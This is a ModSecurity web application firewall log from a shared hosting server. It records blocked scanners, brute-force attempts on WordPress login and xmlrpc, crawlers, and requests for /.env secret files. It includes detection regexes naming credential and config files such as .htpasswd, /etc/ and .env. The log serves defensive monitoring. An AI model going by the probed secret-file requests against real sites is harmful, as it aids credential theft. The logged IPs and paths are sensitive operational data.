[Tue May 26 14:25:42.844947 2026] [security2:error] [pid 606909:tid 607083] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgDl0yRtX9qA7aVUVlmQAAALE"]
[Tue May 26 14:25:43.953144 2026] [security2:error] [pid 610693:tid 610931] [client 4.201.75.230:28227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVgDzvNO3hpmlY6M8RdtQAAAGw"]
[Tue May 26 14:25:44.311514 2026] [security2:error] [pid 610693:tid 610839] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgDzvNO3hpmlY6M8RdtAAAABA"]
[Tue May 26 14:25:46.311180 2026] [security2:error] [pid 610693:tid 610882] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgETvNO3hpmlY6M8Rd2AAAADs"]
[Tue May 26 14:25:47.562148 2026] [security2:error] [pid 610693:tid 610825] [client 202.141.83.254:53812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgEzvNO3hpmlY6M8Rd-gAAAAI"]
[Tue May 26 14:25:47.562300 2026] [security2:error] [pid 610693:tid 610825] [client 202.141.83.254:53812] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgEzvNO3hpmlY6M8Rd-gAAAAI"]
[Tue May 26 14:25:47.626004 2026] [security2:error] [pid 610693:tid 610841] [client 4.201.75.230:28234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVgEzvNO3hpmlY6M8Rd_AAAABI"]
[Tue May 26 14:25:49.066365 2026] [security2:error] [pid 610693:tid 610849] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgFDvNO3hpmlY6M8ReDgAAABo"]
[Tue May 26 14:25:49.159169 2026] [security2:error] [pid 610693:tid 610828] [client 4.201.75.230:28235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVgFTvNO3hpmlY6M8ReFwAAAAU"]
[Tue May 26 14:25:50.558756 2026] [security2:error] [pid 610693:tid 610873] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgFjvNO3hpmlY6M8ReKAAAADI"]
[Tue May 26 14:25:50.675815 2026] [security2:error] [pid 606909:tid 606965] [remote 216.185.214.209:42076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgFl0yRtX9qA7aVUVl6gAAwjc"]
[Tue May 26 14:25:52.499870 2026] [security2:error] [pid 610693:tid 610929] [client 113.179.191.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgGDvNO3hpmlY6M8ReOgAAAGo"]
[Tue May 26 14:25:52.962160 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgGF0yRtX9qA7aVUVmCQAAAP4"]
[Tue May 26 14:25:53.070490 2026] [security2:error] [pid 606909:tid 607056] [client 114.119.150.101:54589] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahVgGV0yRtX9qA7aVUVmFwAAAJY"]
[Tue May 26 14:25:53.072532 2026] [security2:error] [pid 606909:tid 607157] [client 2.57.122.173:59132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/secrets/.env"] [unique_id "ahVgGV0yRtX9qA7aVUVmGAAAAPs"]
[Tue May 26 14:25:53.974482 2026] [security2:error] [pid 606909:tid 607075] [client 2.57.122.173:59156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVgGV0yRtX9qA7aVUVmMAAAAKk"]
[Tue May 26 14:25:55.107195 2026] [security2:error] [pid 606909:tid 607136] [client 65.109.104.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgG10yRtX9qA7aVUVmTwAAAOY"], referer: https://www.anujtradingco.com/
[Tue May 26 14:25:55.263147 2026] [security2:error] [pid 606909:tid 607109] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgGl0yRtX9qA7aVUVmSAAAAMs"]
[Tue May 26 14:25:55.996300 2026] [security2:error] [pid 610693:tid 610905] [client 65.109.104.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgGzvNO3hpmlY6M8ReWgAAAFI"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1435456&moderation-hash=cda715b345677e582654dd7799562d55
[Tue May 26 14:25:56.169308 2026] [security2:error] [pid 606909:tid 607087] [client 47.128.45.35:56736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/"] [unique_id "ahVgHF0yRtX9qA7aVUVmZQAAALU"]
[Tue May 26 14:25:56.659329 2026] [security2:error] [pid 606909:tid 607094] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgHF0yRtX9qA7aVUVmaAAAALw"]
[Tue May 26 14:25:58.134370 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5859] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgHl0yRtX9qA7aVUVmmQAAALA"]
[Tue May 26 14:25:58.134500 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5859] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgHl0yRtX9qA7aVUVmmQAAALA"]
[Tue May 26 14:25:58.206855 2026] [security2:error] [pid 610693:tid 610914] [client 207.174.214.47:48562] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/wp-cron.php"] [unique_id "ahVgHjvNO3hpmlY6M8ReagAAAFs"]
[Tue May 26 14:25:58.533865 2026] [security2:error] [pid 610693:tid 610948] [client 65.109.104.153:60756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 153.104.109.65.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVgHjvNO3hpmlY6M8RebwAAAH0"], referer: https://anujtradingco.com
[Tue May 26 14:25:58.913055 2026] [security2:error] [pid 610693:tid 610906] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgHjvNO3hpmlY6M8RecQAAAFM"]
[Tue May 26 14:26:00.183962 2026] [security2:error] [pid 610693:tid 610943] [client 157.10.97.87:35944] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgHzvNO3hpmlY6M8ReiQAAAHg"]
[Tue May 26 14:26:00.526832 2026] [security2:error] [pid 610693:tid 610943] [client 157.10.97.87:35944] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgHzvNO3hpmlY6M8ReiQAAAHg"]
[Tue May 26 14:26:01.382794 2026] [security2:error] [pid 610693:tid 610823] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgIDvNO3hpmlY6M8RemwAAAAA"]
[Tue May 26 14:26:01.853016 2026] [security2:error] [pid 610693:tid 610919] [client 157.10.97.87:35990] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgITvNO3hpmlY6M8RepgAAAGA"]
[Tue May 26 14:26:01.962913 2026] [security2:error] [pid 610693:tid 610919] [client 157.10.97.87:35990] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgITvNO3hpmlY6M8RepgAAAGA"]
[Tue May 26 14:26:02.956831 2026] [security2:error] [pid 610693:tid 610876] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgIjvNO3hpmlY6M8RerwAAADU"]
[Tue May 26 14:26:03.047434 2026] [security2:error] [pid 606909:tid 607108] [client 157.10.97.87:36038] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgI10yRtX9qA7aVUVmzQAAAMo"]
[Tue May 26 14:26:03.158094 2026] [security2:error] [pid 606909:tid 607108] [client 157.10.97.87:36038] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgI10yRtX9qA7aVUVmzQAAAMo"]
[Tue May 26 14:26:03.960989 2026] [security2:error] [pid 606909:tid 607133] [client 185.191.171.1:21518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVgI10yRtX9qA7aVUVm3QAAAOM"]
[Tue May 26 14:26:03.961162 2026] [security2:error] [pid 606909:tid 607133] [client 185.191.171.1:21518] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVgI10yRtX9qA7aVUVm3QAAAOM"]
[Tue May 26 14:26:04.527306 2026] [security2:error] [pid 610693:tid 610927] [client 157.10.97.87:36096] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJDvNO3hpmlY6M8ReyAAAAGg"]
[Tue May 26 14:26:04.631223 2026] [security2:error] [pid 610693:tid 610927] [client 157.10.97.87:36096] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJDvNO3hpmlY6M8ReyAAAAGg"]
[Tue May 26 14:26:04.866401 2026] [security2:error] [pid 606909:tid 607100] [client 154.161.32.97:56470] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgJF0yRtX9qA7aVUVm4QAAAMI"]
[Tue May 26 14:26:05.457828 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgJV0yRtX9qA7aVUVm5wAAAPg"]
[Tue May 26 14:26:05.753828 2026] [security2:error] [pid 610693:tid 610888] [client 157.10.97.87:36148] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJTvNO3hpmlY6M8Re3wAAAEE"]
[Tue May 26 14:26:05.854746 2026] [security2:error] [pid 610693:tid 610888] [client 157.10.97.87:36148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJTvNO3hpmlY6M8Re3wAAAEE"]
[Tue May 26 14:26:07.237051 2026] [security2:error] [pid 610693:tid 610902] [client 157.10.97.87:36180] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJzvNO3hpmlY6M8Re8AAAAE8"]
[Tue May 26 14:26:07.350024 2026] [security2:error] [pid 610693:tid 610902] [client 157.10.97.87:36180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgJzvNO3hpmlY6M8Re8AAAAE8"]
[Tue May 26 14:26:07.574648 2026] [security2:error] [pid 606909:tid 607101] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgJ10yRtX9qA7aVUVnCgAAAMM"]
[Tue May 26 14:26:08.398575 2026] [ssl:error] [pid 610693:tid 610841] [client 98.84.1.175:56734] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname www.rsmsi.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:26:08.424201 2026] [security2:error] [pid 606909:tid 607065] [client 202.141.83.254:53999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgKF0yRtX9qA7aVUVnGQAAAJ8"]
[Tue May 26 14:26:08.424313 2026] [security2:error] [pid 606909:tid 607065] [client 202.141.83.254:53999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgKF0yRtX9qA7aVUVnGQAAAJ8"]
[Tue May 26 14:26:08.656858 2026] [security2:error] [pid 610693:tid 610941] [client 157.10.97.87:36240] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgKDvNO3hpmlY6M8RfBgAAAHY"]
[Tue May 26 14:26:08.757347 2026] [security2:error] [pid 610693:tid 610941] [client 157.10.97.87:36240] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "friendsalongtheway.net"] [uri "/wp-comments-post.php"] [unique_id "ahVgKDvNO3hpmlY6M8RfBgAAAHY"]
[Tue May 26 14:26:09.193608 2026] [security2:error] [pid 610693:tid 610927] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgKDvNO3hpmlY6M8RfCQAAAGg"]
[Tue May 26 14:26:11.745518 2026] [security2:error] [pid 610693:tid 610914] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgKzvNO3hpmlY6M8RfIQAAAFs"]
[Tue May 26 14:26:13.357978 2026] [security2:error] [pid 610693:tid 610841] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgLDvNO3hpmlY6M8RfPwAAABI"]
[Tue May 26 14:26:15.517927 2026] [core:crit] [pid 610693:tid 610947] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:15.644036 2026] [security2:error] [pid 606909:tid 607051] [client 66.249.73.131:52444] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "midrivermarina.com"] [uri "/ads.txt"] [unique_id "ahVgL10yRtX9qA7aVUVngwAAAJE"]
[Tue May 26 14:26:15.844357 2026] [security2:error] [pid 606909:tid 607153] [client 222.253.151.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgL10yRtX9qA7aVUVngAAAAPc"]
[Tue May 26 14:26:16.047447 2026] [security2:error] [pid 610693:tid 610909] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgLzvNO3hpmlY6M8RfVgAAAFY"]
[Tue May 26 14:26:17.843688 2026] [security2:error] [pid 606909:tid 607108] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgMV0yRtX9qA7aVUVnkgAAAMo"]
[Tue May 26 14:26:18.597743 2026] [security2:error] [pid 606909:tid 607103] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVgMl0yRtX9qA7aVUVnogAAAMU"]
[Tue May 26 14:26:18.598324 2026] [security2:error] [pid 606909:tid 607085] [client 66.249.64.109:60975] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVgMl0yRtX9qA7aVUVnoAAAALM"]
[Tue May 26 14:26:18.852784 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgMjvNO3hpmlY6M8RfeAAAAGs"]
[Tue May 26 14:26:18.852886 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19956] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgMjvNO3hpmlY6M8RfeAAAAGs"]
[Tue May 26 14:26:19.498266 2026] [core:crit] [pid 606909:tid 607063] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
